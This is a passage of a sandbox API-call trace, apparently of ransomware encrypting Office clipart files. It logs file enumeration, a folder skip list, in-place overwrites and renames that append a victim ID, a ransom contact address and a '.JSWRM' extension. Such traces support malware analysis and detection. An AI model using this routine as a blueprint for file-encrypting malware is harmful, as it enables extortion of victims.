lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x770) returned 0x20c6c0 [0098.385] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x770, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x770, lpOverlapped=0x0) returned 1 [0098.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.387] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x770, lpOverlapped=0x0) returned 1 [0098.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.387] CloseHandle (hObject=0x314) returned 1 [0098.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0098.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0098.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0098.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0098.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0098.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0098.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.387] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00642_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00642_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00642_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00642_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0098.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0098.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0098.388] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2094, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00788_.WMF", cAlternateFileName="")) returned 1 [0098.388] lstrcmpiW (lpString1="SY00788_.WMF", lpString2=".") returned 1 [0098.388] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="..") returned 1 [0098.388] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="...") returned 1 [0098.388] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="windows") returned -1 [0098.388] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="recovery") returned 1 [0098.388] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="perflogs") returned 1 [0098.388] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="documents and settings") returned 1 [0098.388] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.389] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="system volume information") returned -1 [0098.389] lstrcmpiW (lpString1="SY00788_.WMF", lpString2="msocache") returned 1 [0098.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00788_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00788_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00788_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0098.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00788_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00788_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00788_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0098.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0098.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0098.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00788_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00788_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.389] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8340) returned 1 [0098.389] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2090) returned 0x205850 [0098.390] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2090, lpOverlapped=0x0) returned 1 [0098.391] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.391] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2090, lpOverlapped=0x0) returned 1 [0098.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.392] CloseHandle (hObject=0x314) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0098.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0098.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0098.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0098.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0098.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00788_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00788_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00788_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00788_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0098.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.393] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fdc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00792_.WMF", cAlternateFileName="")) returned 1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2=".") returned 1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="..") returned 1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="...") returned 1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="windows") returned -1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="recovery") returned 1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="perflogs") returned 1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="documents and settings") returned 1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="system volume information") returned -1 [0098.393] lstrcmpiW (lpString1="SY00792_.WMF", lpString2="msocache") returned 1 [0098.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0098.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00792_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00792_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00792_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0098.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0098.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00792_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00792_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00792_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0098.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0098.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0098.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00792_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00792_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.395] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12252) returned 1 [0098.395] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fd0) returned 0x24d210 [0098.395] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2fd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2fd0, lpOverlapped=0x0) returned 1 [0098.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.397] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2fd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2fd0, lpOverlapped=0x0) returned 1 [0098.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.398] CloseHandle (hObject=0x314) returned 1 [0098.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0098.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0098.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0098.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0098.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0098.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.398] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00792_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00792_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00792_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00792_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0098.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0098.399] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2764, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY00795_.WMF", cAlternateFileName="")) returned 1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2=".") returned 1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="..") returned 1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="...") returned 1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="windows") returned -1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="recovery") returned 1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="perflogs") returned 1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="documents and settings") returned 1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="system volume information") returned -1 [0098.399] lstrcmpiW (lpString1="SY00795_.WMF", lpString2="msocache") returned 1 [0098.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0098.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00795_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00795_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00795_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0098.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0098.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00795_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY00795_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY00795_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0098.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0098.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0098.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00795_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.400] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10084) returned 1 [0098.400] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2760) returned 0x24d210 [0098.400] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2760, lpOverlapped=0x0) returned 1 [0098.451] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.451] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2760, lpOverlapped=0x0) returned 1 [0098.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.451] CloseHandle (hObject=0x314) returned 1 [0098.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0098.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 